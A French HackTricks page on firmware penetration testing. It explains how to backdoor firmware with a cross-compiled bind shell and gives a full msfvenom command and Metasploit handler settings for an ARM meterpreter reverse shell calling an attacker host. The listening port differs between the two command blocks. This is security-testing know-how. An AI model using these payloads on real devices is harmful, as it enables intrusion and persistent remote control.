5.3 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
-
Découvrez The PEASS Family, notre collection exclusive de NFTs
-
Obtenez le swag officiel PEASS & HackTricks
-
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦@carlospolopm.
-
Partagez vos astuces de piratage en soumettant des PR au dépôt hacktricks et au dépôt hacktricks-cloud.
Cette page a été copiée depuis https://scriptingxss.gitbook.io/firmware-security-testing-methodology/
Tentative de téléchargement de micrologiciel personnalisé et/ou de binaires compilés pour détecter des failles d'intégrité ou de signature. Par exemple, compilez un shell de liaison de porte dérobée qui démarre au démarrage en suivant les étapes suivantes.
- Extraire le micrologiciel avec firmware-mod-kit (FMK)
- Identifier l'architecture et l'endianness du micrologiciel cible
- Construire un compilateur croisé avec Buildroot ou utiliser d'autres méthodes adaptées à votre environnement
- Utiliser le compilateur croisé pour construire la porte dérobée
- Copier la porte dérobée dans le micrologiciel extrait /usr/bin
- Copier le binaire QEMU approprié dans le rootfs du micrologiciel extrait
- Émuler la porte dérobée en utilisant chroot et QEMU
- Se connecter à la porte dérobée via netcat
- Supprimer le binaire QEMU du rootfs du micrologiciel extrait
- Repackager le micrologiciel modifié avec FMK
- Tester le micrologiciel avec porte dérobée en l'émulant avec l'outil d'analyse de micrologiciel (FAT) et en se connectant à l'adresse IP et au port de la porte dérobée cible à l'aide de netcat
Si un shell root a déjà été obtenu à partir d'une analyse dynamique, d'une manipulation de chargeur d'amorçage ou de moyens de test de sécurité matérielle, tentez d'exécuter des binaires malveillants précompilés tels que des implants ou des shells inversés. Considérez l'utilisation d'outils de charge utile/implant automatisés utilisés pour les frameworks de commande et de contrôle (C&C). Par exemple, le framework Metasploit et 'msfvenom' peuvent être exploités en suivant les étapes suivantes.
- Identifier l'architecture et l'endianness du micrologiciel cible
- Utiliser
msfvenom
pour spécifier la charge utile cible appropriée (-p), l'adresse IP de l'hôte attaquant (LHOST=), le numéro de port d'écoute (LPORT=), le type de fichier (-f), l'architecture (--arch), la plate-forme (--platform linux ou windows), et le fichier de sortie (-o). Par exemple,msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=192.168.1.245 LPORT=4445 -f elf -o meterpreter_reverse_tcp --arch armle --platform linux
- Transférer la charge utile sur le périphérique compromis (par exemple, exécuter un serveur web local et wget/curl la charge utile sur le système de fichiers) et s'assurer que la charge utile a des autorisations d'exécution
- Préparer Metasploit pour gérer les demandes entrantes. Par exemple, démarrer Metasploit avec msfconsole et utiliser les paramètres suivants en fonction de la charge utile ci-dessus : use exploit/multi/handler,
set payload linux/armle/meterpreter_reverse_tcp
set LHOST 192.168.1.245 #adresse IP de l'hôte attaquant
set LPORT 445 #peut être n'importe quel port inutilisé
set ExitOnSession false
exploit -j -z
- Exécuter le shell inverse meterpreter sur le périphérique compromis
- Observer les sessions meterpreter ouvertes
- Effectuer des activités d'exploitation postérieures
Si possible, identifier une vulnérabilité dans les scripts de démarrage pour obtenir un accès persistant à un périphérique à travers les redémarrages. De telles vulnérabilités surviennent lorsque les scripts de démarrage font référence, liens symboliques, ou dépendent du code situé dans des emplacements montés non fiables tels que les cartes SD, et les volumes flash utilisés pour stocker des données en dehors des systèmes de fichiers racine.